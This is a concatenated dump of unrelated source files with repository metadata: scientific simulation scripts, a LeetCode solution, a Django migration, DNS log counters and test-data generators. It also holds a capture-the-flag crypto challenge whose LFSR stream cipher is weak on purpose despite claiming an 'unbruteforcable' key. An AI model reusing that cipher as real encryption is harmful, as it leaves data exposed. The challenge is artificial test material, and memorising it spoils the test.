        """
        if self._frequency_points is None:
            self._frequency_points = get_frequency_points(
                f_min,
                f_max,
                frequency_step=self._frequency_step,
                num_frequency_points=self._num_frequency_points)
| [
"atz.togo@gmail.com"
] | atz.togo@gmail.com |
cf7667fb4f83684e14b05ef5391d592319cc1bf8 | 24a966b5c2d97c68cff0bbcb0c15aa6d11cecd25 | /challenges/crypto/BabyLFSR/dist/encryptCensored.py | f03ee4a363fc84d9ae8f659fe2c832619a3f6ffc | [] | no_license | Whitehat-Society/whitehacks-challenges-2020-public | d416e86ed8856517820bdf0e2628e9ecfe10180c | d331c91ec257c218c5fae0980a3dbdd2131e084f | refs/heads/master | 2022-11-29T10:51:02.073300 | 2020-08-08T16:03:04 | 2020-08-08T16:03:04 | 285,588,050 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,732 | py | #! /usr/bin/python3
import random
# Register widths (bits) of the four LFSRs; combined seed is sum(KEYS) = 256 bits.
KEYS = [64, 64, 64, 64]
# Tap bitmask per register -- all four registers share the same tap pattern.
TAPS = [15564440312192434176, 15564440312192434176, 15564440312192434176, 15564440312192434176]
class LSFR:
    """Linear feedback shift register over ``length`` bits.

    Each step outputs the parity of the tapped state bits, shifts the state
    left by one, and feeds that parity bit back in at the low end.
    """

    def __init__(self, state, taps, length):
        self.taps = taps
        self.state = state
        self.length = 2 ** length

    def getNext(self):
        # The output/feedback bit is the parity of the masked state.
        masked = self.taps & self.state
        bit = bin(masked).count('1') & 1
        # Shift left, append the feedback bit, wrap to the register width.
        self.state = (self.state * 2 + bit) % self.length
        return bit
class StreamCipher:
    """XOR stream cipher whose keystream combines several LFSR outputs.

    ``func`` maps the list of per-register output bits to one keystream bit.
    """

    def __init__(self, func, *args):
        self.lsfr = list(args)
        self.func = func

    def encrypt(self, string):
        """XOR an iterable of bits with the keystream; pack 8 bits per char.

        Returns the ciphertext as a string of chr() values.
        """
        bits = []
        for char in string:
            out = self.func([reg.getNext() for reg in self.lsfr])
            bits.append(char ^ out)
        # Pack with an index step instead of repeatedly re-slicing the list
        # (the old `bits = bits[8:]` loop was quadratic); also dropped the
        # `key` list, which was built but never used.
        enc = []
        for i in range(0, len(bits), 8):
            enc.append(chr(int(''.join(map(str, bits[i:i + 8])), 2)))
        return ''.join(enc)
def main():
    """Encrypt the flag with the 4-LFSR stream cipher and write out.out."""
    # Unbruteforcable 256 bit key muahahaha
    seed = random.randrange(2**sum(KEYS))
    # Seeding
    # Split the 256-bit seed into four 64-bit register states.
    a = LSFR(seed % 2**KEYS[0], TAPS[0], KEYS[0]); seed //= 2**KEYS[0]
    b = LSFR(seed % 2**KEYS[1], TAPS[1], KEYS[1]); seed //= 2**KEYS[1]
    c = LSFR(seed % 2**KEYS[2], TAPS[2], KEYS[2]); seed //= 2**KEYS[2]
    d = LSFR(seed % 2**KEYS[3], TAPS[3], KEYS[3]); seed //= 2**KEYS[3]
    flag = "WH2020{<CENSORED>}"
    # Flag -> flat iterator of bits, 8 bits per character, MSB first.
    flag = map(int, ''.join('{0:08b}'.format(ord(x), 'b') for x in flag))
    # Keystream bit = XOR of the four register output bits.
    cipher = StreamCipher(lambda l:l[0]^l[1]^l[2]^l[3], a, b, c, d)
    # NOTE(review): `file` shadows a builtin name (in Python 2); harmless here.
    file = open("out.out", "w")
    file.write(cipher.encrypt(flag))
    file.close()
main()
| [
"wongwaituck@gmail.com"
] | wongwaituck@gmail.com |
13eda0de95f9467954a2064cc95a5abdd0b0ec64 | 9e831c0defd126445772cfcee38b57bfd8c893ca | /code/questions/221~230_/224.py | d90b7f67cdd7fc5614ac658666790161c4a04e2c | [] | no_license | m358807551/Leetcode | 66a61abef5dde72250d032b7ea06feb3f2931d54 | be3f037f6e2057a8f2acf9e820bbbbc21d7aa1d2 | refs/heads/main | 2023-04-22T15:13:43.771145 | 2021-05-07T06:47:13 | 2021-05-07T06:47:13 | 321,204,181 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | """
https://leetcode-cn.com/problems/basic-calculator
"""
import re
class Solution(object):
    def calculate(self, s):
        """Evaluate a basic-calculator expression with +, -, parentheses.

        :type s: str
        :rtype: int

        Tokenizes, converts to postfix (shunting-yard), then evaluates.
        Fix over the previous version: unary +/- (at the start of the
        expression or right after '(') no longer crashes -- an implicit 0
        operand is inserted, so "-2+1" evaluates to -1.
        """
        # Isolate every non-digit with '!' so multi-digit numbers survive the
        # split; whitespace-only tokens are then dropped.
        s = re.sub('[^0-9]', lambda x: '!{}!'.format(x.group()), s)
        tokens = [x for x in s.split('!') if x.strip()]
        queue, stack = [], []
        prev = None  # previous token, to detect unary operators
        for x in tokens:
            if x == '(':
                stack.append(x)
            elif x in '+-':
                if prev is None or prev == '(':
                    # Unary operator: give it an explicit zero left operand.
                    queue.append(0)
                # + and - are left-associative with equal precedence.
                while stack and stack[-1] in '+-':
                    queue.append(stack.pop(-1))
                stack.append(x)
            elif x == ')':
                while stack[-1] != '(':
                    queue.append(stack.pop(-1))
                stack.pop(-1)  # discard the '('
            else:
                queue.append(int(x))
            prev = x
        while stack:
            queue.append(stack.pop(-1))
        # Evaluate the postfix queue with an operand stack.
        stack = []
        for x in queue:
            if x == '+':
                stack.append(stack.pop(-2) + stack.pop(-1))
            elif x == '-':
                stack.append(stack.pop(-2) - stack.pop(-1))
            else:
                stack.append(x)
        return stack[0]
# Quick manual check on a fully parenthesised expression (expected: 85).
print(Solution().calculate('(71)-(0)+(14)'))
| [
"m358807551@163.com"
] | m358807551@163.com |
8c9e8735d73a9563e4359e5781a1b5f3533944dd | e3ec66558bd5593c3bac63663e965cfb335e3682 | /teacher/migrations/0009_auto_20200613_2357.py | 1b66a02e81ba428332881d236225115087d875de | [] | no_license | piyushagar/Repo_EduCham | 66d4393e888863f355c59313e0ddc8147c3445ed | e2af04c3ab338e75bfd8746b4e8a4cc32e98ebc7 | refs/heads/master | 2022-11-21T06:33:10.160013 | 2020-07-28T11:35:13 | 2020-07-28T11:35:13 | 282,602,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # Generated by Django 2.2.12 on 2020-06-13 18:27
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: drops Domain.updated_domain and adds a
    # non-negative visit counter that defaults to zero.
    dependencies = [
        ('teacher', '0008_auto_20200611_1524'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='domain',
            name='updated_domain',
        ),
        migrations.AddField(
            model_name='domain',
            name='visit_num',
            field=models.PositiveIntegerField(default=0),
        ),
    ]
| [
"themindzworld@gmail.com"
] | themindzworld@gmail.com |
494853650bc48daabecbdd20ffd1824486452123 | 743d1918178e08d4557abed3a375c583130a0e06 | /src/ToCPSC/getDailyCount.py | dc5994f9a0237db0f7b31ecd26d5406d7d555d78 | [] | no_license | aquablue1/dns_probe | 2a027c04e0928ec818a82c5bf04f485a883cfcb3 | edd4dff9bea04092ac76c17c6e77fab63f9f188f | refs/heads/master | 2020-03-25T19:40:07.346354 | 2018-11-17T05:31:43 | 2018-11-17T05:31:43 | 144,094,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,405 | py | """
" Get the daily count of src of DNS sessions that sent to cpsc ns.
" By Zhengping on 2018-08-14
"""
from src.GeneralAnalysis.DailySrcCount import dailySrcCount
from src.GeneralAnalysis.DailyDstCount import dailyDstCount
from src.GeneralAnalysis.DailyQueryCount import dailyNameCount
from src.GeneralAnalysis.DailyTypeCount import dailyTypeCount
from src.GeneralAnalysis.DailySrcPortCount import dailySrcPortCount
def getDailySrcCount(date, foldername):
    """Count the day's DNS sessions per source and write under foldername."""
    dailySrcCount(date, foldername).getDailySrcCount()
def getDailyDstCount(date, foldername):
    """Count the day's DNS sessions per destination and write under foldername."""
    dailyDstCount(date, foldername).getDailyDstCount()
def getDailyNameCount(date, foldername):
    """Count the day's DNS sessions per query name and write under foldername."""
    dailyNameCount(date, foldername).getDailyNameCount()
def getDailyTypeCount(date, foldername):
    """Count the day's DNS sessions per query type and write under foldername."""
    dailyTypeCount(date, foldername).getDailyTypeCount()
def getDailySrcPortCount(date, foldername):
    """Count the day's DNS sessions per source port and write under foldername."""
    dailySrcPortCount(date, foldername).getDailySrcPortCount()
if __name__ == '__main__':
    # Run every daily counter for one fixed date; results land in foldername.
    date = "2018-09-19"
    foldername = "../../result/ToCPSC/"
    getDailySrcCount(date, foldername)
    getDailyDstCount(date, foldername)
    getDailyNameCount(date, foldername)
    getDailyTypeCount(date, foldername)
    getDailySrcPortCount(date, foldername)
"94apieceofcake@gmail.com"
] | 94apieceofcake@gmail.com |
813b34903e5f3ee77820d5f996575d4777884df1 | fbbf145adf4a13eb4259497e045a6176ba264f7d | /Turbo Sort.py | 79507afb9cd79e553334a05a9f02e5734ceea622 | [] | no_license | prem17101996/CodeChef | f540803d5bbf7185f75ca8bf94b7bbb35b405302 | 2c71c6382b59fc2274c4d9d05a9aac834999b2da | refs/heads/main | 2023-03-28T11:34:51.419729 | 2021-03-30T15:07:14 | 2021-03-30T15:07:14 | 350,218,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | t=int(input())
lst=[]
for i in range(t):
numbers=int(input())
lst.append(numbers)
lst.sort()
for item in lst:
print(item) | [
"premmishra17101996@gmail.com"
] | premmishra17101996@gmail.com |
fb667daf739dfa1b36e500e88c786b477b12dc1e | e73761205fdd93a3da3ac6a91a970efe164a334b | /DataStructure/Linkedlist/Linkedlistdemo.py | 7283ca3be527fcedda3d1b88282a8a9685b9b65b | [] | no_license | keer1305/Geeks | 90bffa43109cee50ee64e21f4c062b6519b95775 | 058a609e15dbbb1eebe087d1667277f56c6ff334 | refs/heads/master | 2020-03-27T17:50:46.043239 | 2018-09-11T04:37:00 | 2018-09-11T04:37:00 | 146,878,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | class Node:
def __init__(self,data):
self.data=data
self.next=None
class LinkedList:
def _init_(self):
self.head=None
def printlist(self):
temp = self.head
while temp is not None:
print(temp.data,end=" ")
temp=temp.next
list=LinkedList()
list.head=Node("ONE")
c2=Node("TWO")
c3=Node("THREE")
list.head.next=c2
c2.next=c3
list.printlist()
| [
"skeerthi1305@gmail.com"
] | skeerthi1305@gmail.com |
0332de66313e7c834a9f8d41b8af3baf302e7042 | 909e2eafcd37023d9b9ecdefe52bf2dffe28daf4 | /mix_data_batcher.py | 7defdbd9b7633d06580064dea8a7bd324ab50fab | [] | no_license | Websail-NU/OTyper | 2796411e7a7ced79d3a297734c1ab509edcb47dc | b5301026b95e0eabf8eb8a286205b95dbb2b61dd | refs/heads/master | 2021-06-27T15:34:21.849512 | 2019-05-08T18:45:09 | 2019-05-08T18:45:09 | 93,091,277 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,933 | py | import numpy as np
import random
from scipy.sparse import save_npz, load_npz
class Vocabulary:
    """Word <-> index mapping backed by mix_data/word_list.txt.

    The word on line N of the file gets index N. Unknown words map to the
    index of 'unk' (which is assumed to be present in the word list).
    """

    def __init__ (self):
        self._w2i = {}
        self._i2w = []
        self.add_all()

    def add_all(self):
        """Load the vocabulary file; uses enumerate instead of a manual
        counter, and streams the file instead of readlines()."""
        with open('mix_data/word_list.txt', 'r') as f:
            for pos, line in enumerate(f):
                word = line.rstrip('\n')
                self._w2i[word] = pos
                self._i2w.append(word)

    def w2i(self, word):
        """Return the index of `word`; fall back to lowercase, then 'unk'."""
        if word in self._w2i:
            return self._w2i[word]
        if word.lower() in self._w2i:
            return self._w2i[word.lower()]
        return self._w2i['unk']

    def i2w(self, i):
        """Return the word stored at index `i`."""
        return self._i2w[i]
class mix_data_multi_label:
    """Batcher for multi-label entity-typing data (entities, contexts, types)."""

    def __init__ (self, batch_size = 1000, entity_file = 'mix_data/train_mix_word_with_context.txt', \
            context_file = 'mix_data/train_mix_tagged_context.txt', \
            type_file = 'mix_data/train_mix_Types_with_context_sparse.npz'):
        self.shuffle_flag = 0
        self.vob = Vocabulary()
        self.load_data(entity_file, context_file, type_file)
        self.train_pos = 0
        # Never ask for a batch larger than the dataset itself.
        self.batch_size = min(batch_size, len(self.Entity_var_ids))
        self.total_batch_num = int(len(self.Entity_var_ids) / self.batch_size)

    def load_data(self, entity_file, context_file, type_file, window_size = 10):
        """Read entities (word ids), left/right contexts, and sparse type labels."""
        self.Entity_var_ids = []
        with open(entity_file, 'r') as f:
            for line in f:
                t_l = []
                for w in line.replace('\n','').split():
                    t_l.append(self.vob.w2i(w))
                self.Entity_var_ids.append(t_l)
        # r_Left is stored reversed (nearest-to-entity word first).
        self.r_Left_context_ids = []
        self.Right_context_ids = []
        with open(context_file, 'r') as f:
            for line in f:
                context = line.replace('\n','')
                t_r_Left_context_ids, t_Right_context_ids = \
                    self.get_r_left_right_context(context, window_size)
                self.r_Left_context_ids.append(t_r_Left_context_ids)
                self.Right_context_ids.append(t_Right_context_ids)
        self.Types = load_npz(type_file)
        # self.r is the (optionally shuffled) iteration order over examples.
        self.r = list(range(0, len(self.Entity_var_ids)))
        if self.shuffle_flag == 1:
            self.shuffle()

    def shuffle(self):
        """Shuffle the example iteration order in place."""
        random.shuffle(self.r)

    # select_flag == 0: select_all
    # select_flag == 1: select train label, delete ids
    # select_flag == 2: select test label, take ids
    # def next_batch(self, window_size = 10, select_flag = 0, seen_label_ids = None, unseen_label_ids = None):
    def next_batch(self, select_label_ids):
        """Return the next padded batch, keeping only the given label columns.

        Wraps around the dataset when the end is reached (train_pos is modular).
        """
        ret_Entity_var_ids = []
        ret_r_Left_context_ids = []
        ret_Right_context_ids = []
        ret_Ys = []
        count = 0
        while count < self.batch_size:
            local_Entity_var_ids = []
            local_Left_context_ids = []
            local_Right_context_ids = []
            local_Entity_var_ids = self.Entity_var_ids[self.r[self.train_pos]]
            local_r_Left_context_ids = self.r_Left_context_ids[self.r[self.train_pos]]
            local_Right_context_ids = self.Right_context_ids[self.r[self.train_pos]]
            # Densify this row of the sparse label matrix.
            local_Ys = self.Types[self.r[self.train_pos]].todense()
            local_Ys = np.squeeze(np.asarray(local_Ys))
            ret_Entity_var_ids.append(local_Entity_var_ids)
            ret_r_Left_context_ids.append(local_r_Left_context_ids)
            ret_Right_context_ids.append(local_Right_context_ids)
            ret_Ys.append(local_Ys)
            self.train_pos = (self.train_pos + 1) % (len(self.Entity_var_ids))
            count += 1
        # Pad variable-length sequences with the '_my_null_' token id.
        ret_Entity_ids, ret_Entity_lens = vstack_list_padding_2d(ret_Entity_var_ids, padding_element = self.vob.w2i('_my_null_'))
        ret_r_Left_context_ids, ret_Left_context_lens = vstack_list_padding_2d(ret_r_Left_context_ids, padding_element = self.vob.w2i('_my_null_'))
        ret_Right_context_ids, ret_Right_context_lens = vstack_list_padding_2d(ret_Right_context_ids, padding_element = self.vob.w2i('_my_null_'))
        # Un-reverse the left context so it reads left-to-right again.
        ret_Left_context_ids = []
        for e in ret_r_Left_context_ids:
            ret_Left_context_ids.append(e[::-1])
        ret_Entity_ids = np.asarray(ret_Entity_ids, dtype=np.float32)
        ret_Entity_lens = np.asarray(ret_Entity_lens, dtype=np.float32)
        batch_size = ret_Entity_ids.shape[0]
        type_size = len(select_label_ids)
        ret_Left_context_ids = np.asarray(ret_Left_context_ids, dtype=np.float32)
        ret_Left_context_lens = np.asarray(ret_Left_context_lens, dtype=np.float32)
        ret_Right_context_ids = np.asarray(ret_Right_context_ids, dtype=np.float32)
        ret_Right_context_lens = np.asarray(ret_Right_context_lens, dtype=np.float32)
        # Feature tensors are placeholders (all zeros) in this data mix.
        ret_Feature_ids = np.zeros((batch_size, 70))
        t_type_only_features = np.zeros((batch_size, type_size, 3))
        ret_Entity_type_features = np.zeros((batch_size, type_size, 3))
        ret_Exact_entity_type_features = np.zeros((batch_size, type_size, 3))
        ret_Type_only_features = np.zeros((batch_size, type_size, 3))
        ret_Ys = np.asarray(ret_Ys, dtype=np.float32)
        # Keep only the requested label columns.
        ret_Ys = np.take(ret_Ys, select_label_ids, 1)
        return ret_Entity_ids, ret_Entity_lens, ret_Left_context_ids, ret_Left_context_lens, \
            ret_Right_context_ids, ret_Right_context_lens, ret_Feature_ids, \
            ret_Entity_type_features, ret_Exact_entity_type_features, \
            ret_Type_only_features, ret_Ys

    def get_r_left_right_context(self, context_string, window_size):
        """Split a '<e>...</e>'-tagged sentence into window-limited contexts.

        Returns (reversed left context ids, right context ids); each side is
        truncated to at most window_size tokens nearest the entity.
        """
        words = context_string.split()
        l_pos = len(words)
        r_pos = len(words)
        for i in range(0, len(words)):
            if words[i] == '<e>':
                l_pos = i
            if words[i] == '</e>':
                r_pos = i
        # r_l_context: r_ for reverse
        r_l_context = []
        for i in range(l_pos-1, -1, -1):
            r_l_context.append(self.vob.w2i(words[i]))
            if len(r_l_context) >= window_size:
                break
        r_context = []
        for i in range(r_pos+1, len(words)):
            r_context.append(self.vob.w2i(words[i]))
            if len(r_context) >= window_size:
                break
        return r_l_context, r_context
def get_train_label_emb(label_embs, Ys):
    """Identity pass-through for the training label embeddings and targets."""
    return (label_embs, Ys)
def get_test_label_emb(label_embs, Ys):
    """Identity pass-through for the test label embeddings and targets."""
    return (label_embs, Ys)
def vstack_list_padding_2d(data, padding_element=0, dtype=np.int32):
    """Stack variable-length rows into a padded 2-D array.

    Returns (arr, lengths): arr is len(data) x max_len, with each row padded
    to the right with padding_element; lengths holds the true row sizes.
    Fix: no longer crashes on empty `data` (max() of an empty sequence).
    """
    lengths = [len(row) for row in data]
    max_len = max(lengths, default=0)  # default guards against empty input
    arr = np.full((len(data), max_len), padding_element, dtype=dtype)
    for i, row in enumerate(data):
        arr[i, 0:len(row)] = row
    return arr, np.array(lengths, dtype=np.int32)
if __name__ == "__main__":
a= mix_data_multi_label()
a.next_batch(list(range(0,100)))
| [
"zys133@thor.cs.northwestern.edu"
] | zys133@thor.cs.northwestern.edu |
882f9edf92e0ddbb10a8c25eb450ef6e191608d8 | f59f7272e9ada94499cd683cf5a43e04bcf92d43 | /mysite/urls.py | 5b43b266de2ebc7c743661026db9c162fc843f5b | [] | no_license | hateif/my-first-blog1 | 69a261b504bbd63746082147d271438f763432d3 | 1d2f8f9078a5ae332a3c181f85b96d5b2fcc0880 | refs/heads/master | 2021-01-10T10:40:33.386445 | 2016-01-14T07:17:47 | 2016-01-14T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    # NOTE(review): string view references ('blog.views.index') are deprecated
    # in Django 1.9 and removed in 1.10 -- fine for this pinned version, but
    # switch to importing the view callable before upgrading.
    url(r'^blog/index/$', 'blog.views.index'),
    url(r'^polls/', include('polls.urls')),
]
| [
"lihao@tdmarco.com"
] | lihao@tdmarco.com |
12dad381805512acbfb45f4df790488bcc3335bf | 0869d7edac80e8aebe951682a2cc311a083eade3 | /Python/tdw/object_data/composite_object/composite_object_dynamic.py | e9057a039e69ee0a014cfdd06af0f7a5dfabbdb8 | [
"BSD-2-Clause"
] | permissive | threedworld-mit/tdw | 7d5b4453832647733ff91ad7a7ce7ec2320454c1 | 9df96fba455b327bb360d8dd5886d8754046c690 | refs/heads/master | 2023-09-01T11:45:28.132298 | 2023-08-31T16:13:30 | 2023-08-31T16:13:30 | 245,492,977 | 427 | 75 | BSD-2-Clause | 2023-09-14T17:36:12 | 2020-03-06T18:42:09 | Python | UTF-8 | Python | false | false | 1,537 | py | from typing import Dict
from tdw.object_data.composite_object.sub_object.light_dynamic import LightDynamic
from tdw.object_data.composite_object.sub_object.hinge_dynamic import HingeDynamic
class CompositeObjectDynamic:
    """
    Dynamic data for a composite object and its sub-objects.

    Note that not all sub-objects will be in this output data because some of them don't have specialized dynamic properties.
    For example, non-machines have dynamic positions, velocities, etc. but these can be found in `Transforms` and `Rigidbodies` data, respectively.
    """

    def __init__(self, object_id: int, hinges: Dict[int, HingeDynamic], lights: Dict[int, LightDynamic]):
        """
        :param object_id: The ID of the root object.
        :param hinges: A dictionary of [`HingeDynamic`](sub_object/hinge_dynamic.md) sub-objects, which includes all hinges, springs, and motors. Keyed by sub-object ID.
        :param lights: A dictionary of [`LightDynamic`](sub_object/light_dynamic.md) sub-objects such as lamp lightbulbs. Keyed by sub-object ID.
        """

        """:field
        The ID of the root object.
        """
        self.object_id = object_id
        """:field
        A dictionary of [`HingeDynamic`](sub_object/hinge_dynamic.md) sub-objects, which includes all hinges, springs, and motors.
        """
        self.hinges: Dict[int, HingeDynamic] = hinges
        """:field
        A dictionary of [`LightDynamic`](sub_object/light_dynamic.md) sub-objects such as lamp lightbulbs.
        """
        self.lights: Dict[int, LightDynamic] = lights
| [
"alters@mit.edu"
] | alters@mit.edu |
e7d040ce1e08fba4331f7381d97868210cb2b86d | 866c5b1f43da3363ba6004c0394a24345b64c3e0 | /eval.py | 76da78c175f78ed19042b618b78205b692d49bfc | [] | no_license | vighneshbirodkar/deep_symmetry | 1e6bb23f954814051aca76204f5adfac18875254 | 57de3dcc7b97482f207bd1965fe5b666341e8677 | refs/heads/master | 2021-01-17T19:52:21.716981 | 2016-06-27T03:41:54 | 2016-06-27T03:41:54 | 62,023,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | from __future__ import division, print_function
from external.slim import slim
import tensorflow as tf
from cnnutil import FolderReader
import numpy as np
from commons import get_pbar
from model import inference
SIZE = 32
x_train = tf.placeholder(tf.float32, shape=(None, SIZE, SIZE, 3))
y_train = tf.placeholder(tf.float32, shape=(None, 2))
y_pred = inference(x_train, is_training=False)
correct_preds = tf.equal(tf.argmax(y_pred, 1), tf.argmax(y_train, 1))
fr = FolderReader('./samples', 32, 32)
sess = tf.Session()
sess.run(tf.initialize_all_variables())
saver = tf.train.Saver()
saver.restore(sess, './models/model-1')
pbar = get_pbar(fr.get_validation_size())
seen_samples = 0
correct_samples = 0
for x_batch, y_batch in fr.get_validation_batch(100):
seen_samples += x_batch.shape[0]
fd = {x_train: x_batch, y_train: y_batch}
preds = sess.run([correct_preds], feed_dict=fd)
cp = np.sum(preds)
correct_samples += cp
pbar.update(seen_samples, Accuracy=100*cp/x_batch.shape[0])
pbar.finish()
print('Validation Accuracy = %f' %
(100*float(correct_samples) / float(fr.get_validation_size())))
| [
"vighneshbirodkar@nyu.edu"
] | vighneshbirodkar@nyu.edu |
e249c35845603892c2544a6ffa2a1cf888414eb8 | c7baedd81f9daa6921714b4b44e8496d02fc2d96 | /testlib.py | 1231b3840b3053f71e8b68a320e9a45b0f2601e2 | [] | no_license | santonsh/accenture_scrapper_practice | cc569bb45394718e85f11fe9e716a4c9673c68ca | 71c4a9f70aeb6ff2350012172e5b5195ec1d34df | refs/heads/master | 2022-04-16T05:15:36.639425 | 2020-04-13T21:07:30 | 2020-04-13T21:07:30 | 254,945,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,380 | py | import random
from math import floor
# ASCII code pools for generating random names. range() upper bounds are
# exclusive, so 58/91/123 are required to actually include '9', 'Z' and 'z'
# (the previous 57/90/122 silently dropped those valid characters).
valid_domain_name_chars = [c for c in range(48, 58)] + [c for c in range(65, 91)] + [c for c in range(97, 123)] + [45]
valid_username_chars = [c for c in range(48, 58)] + [c for c in range(65, 91)] + [c for c in range(97, 123)] + [45, 46, 43, 95]
def generate_string(length, valid_set):
    """Return a list of `length` random characters drawn from `valid_set` codes."""
    return list(map(chr, (random.choice(valid_set) for _ in range(length))))
def generate_email():
    """Generate a syntactically valid random email address.

    Uses the module-level character pools; the old local redefinition of
    valid_domain_name_chars duplicated the module constant and was removed.
    """
    username = ''.join(generate_string(10, valid_username_chars))
    domainname = ''.join(generate_string(10, valid_domain_name_chars))
    domain = random.choice(['com', 'co.il', 'info'])
    return username + '@' + domainname + '.' + domain
def generate_domainname():
    """Generate a random domain name (10-char label plus a random TLD)."""
    label = ''.join(generate_string(10, valid_domain_name_chars))
    tld = random.choice(['com', 'co.il', 'info'])
    return '{}.{}'.format(label, tld)
def generate_url(domainname=None):
    """Generate a simple random URL, optionally on the given domain name."""
    depth = random.choice([1, 2, 3, 4, 5])
    segments = [''.join(generate_string(5, valid_domain_name_chars)) for _ in range(depth)]
    path = ''.join('/' + seg for seg in segments)
    host = domainname if domainname else generate_domainname()
    return 'http://www.' + host + path
def generate_link(domainname=None):
    """Wrap a freshly generated random URL in an HTML anchor tag."""
    return '<a href="{}"></a>'.format(generate_url(domainname))
def generate_page(links, emails):
    """Build a random page body embedding the given links and emails.

    Layout (space-joined): filler, then anchor/filler per link, a filler,
    then email/filler per email, and a final filler.
    """
    def filler():
        return ''.join(generate_string(30, valid_domain_name_chars))

    parts = [filler()]
    for target in links:
        parts.append('<a href="' + target + '"></a>')
        parts.append(filler())
    parts.append(filler())
    for address in emails:
        parts.append(address)
        parts.append(filler())
    parts.append(filler())
    return ' '.join(parts)
class testNode():
    """this is a node representing a test internet page with its links and emails"""
    def __init__(self, url, links, emails):
        self.url = url
        self.links = links
        self.emails = emails
        # Rendered page text; empty until generate_page() is called.
        self.page = ''
    def generate_page(self):
        """Render this node's page body from its links and emails."""
        self.page = generate_page(self.links, self.emails)
    def get_page(self):
        """Return the rendered page text (empty string before rendering)."""
        return self.page
def generate_test_graph(sameDomain = False):
    """Simple non deterministic algorithm to generate test internet graph to be used in tests. The test graph is very link redundant. Need to generate thinner graph later """
    num = 100
    urls = []
    emails = []
    nodes={}
    # With sameDomain every URL shares one random domain; otherwise each URL
    # gets its own random domain.
    if sameDomain:
        domain = generate_domainname()
    else:
        domain = None
    for i in range(num):
        urls.append(generate_url(domain))
        emails.append(generate_email())
    used_urls = set()
    used_emails = set()
    # Each page links to ~num/4 random URLs and embeds ~num/10 random emails
    # (sampled with replacement, hence the redundancy noted above).
    for u in urls:
        l = random.choices(urls, k = floor(num/4))
        #l = [u for u in urls]
        e = random.choices(emails, k = floor(num/10))
        #e = [e for e in emails]
        used_urls.update(l)
        used_emails.update(e)
        nodes[u] = testNode(u, l, e)
        nodes[u].generate_page()
    return nodes, urls, emails
| [
"santonsh@gmail.com"
] | santonsh@gmail.com |
5f1d5f3868ca2f03ad7087cb4da80a572750a29e | 0a5eb3d095191f6b8eefbc2ae364bfc7c2ad6380 | /wales_diamonds.py | 15033f0fd706b20eeb9c6fe172c9ca8862b94b0d | [] | no_license | jaeilpark/self_assembly | 8d96a41811e35a547fa6bd04426631db55951cbd | da7f65290f1d0cc0244cac31276f0961b45dd30c | refs/heads/master | 2023-03-19T17:07:28.617925 | 2019-10-29T04:37:33 | 2019-10-29T04:37:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,721 | py | #!/share/apps/md/bin/pyt2.7
import os, sys, re, time, math
from config_dict import config_dict
from hoomd import *
from hoomd import md
from hoomd import data
from hoomd import deprecated
context.initialize()
# Parse CLI: <input_file> <seed>. Python 2 script (note the print statement).
try:
    seed = int(sys.argv[2])
    config = config_dict(sys.argv[1])
except:
    print "Usage: %s <input_file> <seed>" % sys.argv[0]
    raise
start=0
#load gsd file to initialize system
# Fresh run: generate the initial configuration; restart run: resume from
# the last logged time step.
if not os.path.exists('sd%s.gsd' % seed):
    from gen_wales_diamonds_poly import GenMulti
    GenMulti(config, seed)
    start=1
    system = init.read_gsd(filename='sd%s.gsd' % seed, restart='sd%s_a.gsd')
else:
    print(os.getcwd() + "\n")
    # Recover the last time step from the final line of the log file.
    with open('sd%s.log'%seed) as f:
        timeStep = int(f.readlines()[-1].split('\t')[0])+1
    print('restarting from %d'%timeStep)
    system = init.read_gsd(filename='sd%s_a.gsd' % seed, restart='sd%s_b.gsd',time_step=timeStep)
#load atomic positions
atomPositionsFile1 = config['Atom Positions File1']
atom_pos1=[]
#with open(atomPositionsFile,'r') as fPos:
# NOTE(review): fPos is never closed; fine for a short script but a `with`
# block would be safer.
fPos = open(atomPositionsFile1,'r')
for line in fPos:
    data = line.strip().split()
    atom_pos1.append( map(float,data) )
#list of atoms in CP B-C
nameList1= ['TC']+['TB'] + ['X1'] + ['X1'] + ['A1B']+['A1B'] + ['A2C']+['A2B'] + ['A3C']+['A5B']+['A5C']+['A3B'] + ['A4C']+['A6B']+['A6C']+['A4B']+['X1']*4+['X2']*4+['Q']*12
beadsizeList1 = [1.0]*4 + [0.1]*12 + [1.0]*4 + [0.8]*4 + [0.5]*12
#load atomic positions
atomPositionsFile2 = config['Atom Positions File2']
atom_pos2=[]
#with open(atomPositionsFile,'r') as fPos:
fPos = open(atomPositionsFile2,'r')
for line in fPos:
    data = line.strip().split()
    atom_pos2.append( map(float,data) )
#list of atoms in CP A-A
nameList2 = ['TA']*2 + ['X1']*2 + ['A1A']+['A1A'] + ['A2A']+['A2A'] + ['A5A']+['A3A']+['A3A']+['A5A'] + ['A6A']+['A4A']+['A4A']+['A6A']+['X1']*4+['X2']*4+['Q']*12
beadsizeList2 = [1.0]*4 + [0.1]*12 + [1.0]*4 + [0.8]*4 + [0.5]*12
#set up twp rigid bodies
#rigid body 1
# C0/C1 are the two rigid-body center types; constituent beads use the name
# and diameter lists above.
rigid = md.constrain.rigid()
rigid.set_param('C0', positions=atom_pos1, types=nameList1, diameters=beadsizeList1)
